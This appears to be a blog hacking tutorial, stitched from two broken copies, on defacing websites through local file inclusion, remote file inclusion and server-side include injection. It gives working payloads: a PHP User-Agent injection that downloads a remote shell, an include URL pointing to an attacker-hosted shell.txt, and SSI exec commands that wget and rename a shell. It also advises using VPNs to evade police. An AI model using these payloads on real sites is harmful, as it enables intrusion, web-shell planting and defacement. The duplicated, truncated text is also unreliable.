Table of Contents
Chapter I: Recon
Chapter II: Getting the tools ready
Chapter III: Getting your ass safe
Chapter IV: Local File Inclusion
Chapter V:Remote File Inclusion
Chapter VI:Server Side Inclusion
Chapter VII: Last word
Chapter I: Recon
Allright imagine this: "You are a NAVY seal, ready to strike Osama binladens House. But.... you havent prepared any strategy, plan, you havent found any flaw in the house its security. I bet you could tell me whats going to happen with the mission. COMPLETE FAILURE.
Always plan, plan and dont forget... Plan. Let me explain you briefly what i mean with planning. The art of planning is basicly gathering information about your target. The information i always collect is: The OS, TheCMS it is running, Are there any open ports?. Then after i have gathered that information i usually perform a paros Proxy scan on the site. Basicly all it does is, scan the site for vulnerabilities and make up an fancy report.
If you wantto download and use Paros for yourself be my guest .
Allright now.. I assume that you have the following information:
Any idea which ports are open on the target, TheOperating System , The possible CMS the server is running (not necessary) and Your Paros Proxy report. Thats basicly all the information you need to determine which kind of attack you are going to use against the target.
Chapter II: Tools
Like every job there is, you will need tools.
We hackers have a very small ammount of tools necessarry to complete our main goal. Which is exploiting that one website you wish to deface.
Allright troughout thistutorial we are not going to use fancy tools etc.
Instead we will be using these key tools: -Your brain, -Your hands and last but certainly not least.... Firefox.
Make sure that you have eitherhttp headers or tamperdata installed as a firefox plugin .
Chapter III: Safey
In a world, where people hack targets you have another group of people. I bet you feel this comming.... The police.
Trust me on this one, once you start hacking big sites. The police will try to get your ass. But not when we are around. We can outsmart the police by using aVPN . VPN stands for Virtual Private Network. Basicly its a server you can connect to, which will intercept all your packets and make them go trough their server. All that it does is hide your real IP.
Somefree VPN 's are: Cyberghost, VPNreactor and nProx.
Once you move on to the bigger sites, i would highly recommend to get apaid VPN like vpntunnel or anonine.
Chapter IV: Local File Inclusion
Most of you have probally heard about this method once or twice. This is the so called "LFI" exploitation method.
LFI can occur on sites with this extension:
When you perform an LFI attack you attempt to bypass the server directories to end up into the proc/self/environ directory. This can be done with ../../../proc/self/environ or if the ../. Useless you say? WELL i couldnt disagree more with you on that one. You see on the first sight proc/self/environ seems like a bunch of shit.
It will looksomething like this :
But there is something really cool we can do with this.
We can spawn ashell trough this directory...
Now i got your attention right? Good. To spawn a shell we simply open up our tamper data en reload the page while we are tampering.
Once you see a little messagepop up, click tamper data.
Now we will notice a little Useragent tab.
In there we will type the following code:
PHP Code :
Thanks to Legit for that code. Works beter then mine with system();
Now once you have done that, click the submit button and your shell should be spawned
. To check if it worked go to http://site.com/shell.php and voila.
Chapter V:Remote File Inclusion
Im not very glad to say, but this is one of the goodexploit methods that has died. There are almost no websites who have this vulnerability. Thats because its so easy to fix and yet so harmfull.
I will explain you the so called "RFI" briefly.
RFI or remote file inclusion is an technique where you exploit the include(); function.
RFI and LFI are quite similair, there's a catch tho. "Remote" refers to using an external site to upload your shell and "Local" refers to uploading your shell using the same site.
For an example: a site includesphp scripts in an un-protected manner.
A little bit like this:
Now to exploit this we will execute the following command:
Now you are wondering.. why the hell did he use a .txt shell?
PHP automaticly transfers .txt > .php. which will result in a nice shell to own/deface the website.
Chapter VI:Server Side Inclusion
Okay now we move on to the "harder" methods.
Server Side Inclusion orSSI is an advanced technique that exploits vulnerabilities in the HTML code.
All that this means is that you inject script into html-forms and that it will result in spawning a shell or doing something worse.
SSI can only be performed in a few pages. Only pages with .shtml and .shtm are affected by this. These pages are 100% injectable. There is a something else to keep in mind. SSI will also work in normal pages, but ONLY when the input is not filtered.
For an example we have a little textbox which is vulnerable to SSI.
We can do some nice little commands here for an example:
i will explain these 2 commands to you for a moment.
The first command lets you browse directories that you cant acces without administrator priveleges. The second command lets you download your shell on the website (This is the shit we are interested in).
Then the only thing left for you to do is to locate your file by executing this command:
Chapter VII: Last things
Well this was my little tutorial regarding uncommon forms of attack.
I hope you have learned something from it and i hope to hear your personal experiences with this.
If this helped you, please leave any form of thank you. Its highly appreciated :)
Chapter I: Recon
Chapter II: Getting the tools ready
Chapter III: Getting your ass safe
Chapter IV: Local File Inclusion
Chapter V:
Chapter VI:
Chapter VII: Last word
Chapter I: Recon
Allright imagine this: "You are a NAVY seal, ready to strike Osama binladens House. But.... you havent prepared any strategy, plan, you havent found any flaw in the house its security. I bet you could tell me whats going to happen with the mission. COMPLETE FAILURE.
Always plan, plan and dont forget... Plan. Let me explain you briefly what i mean with planning. The art of planning is basicly gathering information about your target. The information i always collect is: The OS, The
If you want
Allright now.. I assume that you have the following information:
Any idea which ports are open on the target, The
Chapter II: Tools
Like every job there is, you will need tools.
We hackers have a very small ammount of tools necessarry to complete our main goal. Which is exploiting that one website you wish to deface.
Allright troughout this
Instead we will be using these key tools: -Your brain, -Your hands and last but certainly not least.... Firefox.
Make sure that you have either
Chapter III: Safey
In a world, where people hack targets you have another group of people. I bet you feel this comming.... The police.
Trust me on this one, once you start hacking big sites. The police will try to get your ass. But not when we are around. We can outsmart the police by using a
Some
Once you move on to the bigger sites, i would highly recommend to get a
Chapter IV: Local File Inclusion
Most of you have probally heard about this method once or twice. This is the so called "LFI" exploitation method.
LFI can occur on sites with this extension:
Code:
http://site.com/index.php ?page=It will look
Code:
TMPDIR=/var/chroot/home/content /23/8340423/tmpPHPRC=/var/chroot/home/content/23/8340423/htmlTEMP=/var/chroot/home/content/23/8340423/tmpPHP_FCGI_CHILDREN=0PATH=/usr/local/bin:/usr/bin:/binPWD=/web/cgi-binSHLVL=0RAILS_ENV=productionSPI=TRUETMP=/var/chroot/home/content/23/8340423/tmpPHP_FCGI_MAX_REQUESTS=100000We can spawn a
Now i got your attention right? Good. To spawn a shell we simply open up our tamper data en reload the page while we are tampering.
Once you see a little message
Now we will notice a little Useragent tab.
In there we will type the following code:
<?php $file = fopen("shellname.php","w+"); $stream = fopen ("Link you shell here/shell.txt", "r"); while(!feof($stream)) {$shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>Now once you have done that, click the submit button and your shell should be spawned
. To check if it worked go to http://site.com/shell.php and voila.Chapter V:
Im not very glad to say, but this is one of the good
I will explain you the so called "RFI" briefly.
RFI or remote file inclusion is an technique where you exploit the include(); function.
RFI and LFI are quite similair, there's a catch tho. "Remote" refers to using an external site to upload your shell and "Local" refers to uploading your shell using the same site.
For an example: a site includes
A little bit like this:
PHP Code:
<?php
$color = 'blue';
if (isset( $_GET['COLOR'] ) )$color = $_GET['COLOR'];
include( $color . '.php' );?>Now to exploit this we will execute the following command:
Code:
http://site.com/index.php?page=http://yourevilsite.com/shell.txtNow you are wondering.. why the hell did he use a .txt shell?
PHP automaticly transfers .txt > .php. which will result in a nice shell to own/deface the website.
Chapter VI:
Okay now we move on to the "harder" methods.
Server Side Inclusion or
All that this means is that you inject script into html-
SSI can only be performed in a few pages. Only pages with .shtml and .shtm are affected by this. These pages are 100% injectable. There is a something else to keep in mind. SSI will also work in normal pages, but ONLY when the input is not filtered.
For an example we have a little textbox which is vulnerable to SSI.
We can do some nice little commands here for an example:
Code:
< !--#exec cmd="cd \admin\dir">
< !--#exec cmd="wget http://www .yoursite.com/youknowwutthisis.txt" -->The first command lets you browse directories that you cant acces without administrator priveleges. The second command lets you download your shell on the website (This is the shit we are interested in).
Then the only thing left for you to do is to locate your file by executing this command:
Code:
< !--#exec cmd="cp folderlocation/shellname.txt folderlocation/yourshellname.php" -->
This basicly finds your shell.txt, converts it to PHP and places it in the directory of your choice.Chapter VII: Last things
Well this was my little tutorial regarding uncommon forms of attack.
I hope you have learned something from it and i hope to hear your personal experiences with this.
If this helped you, please leave any form of thank you. Its highly appreciated :)
No comments:
Post a Comment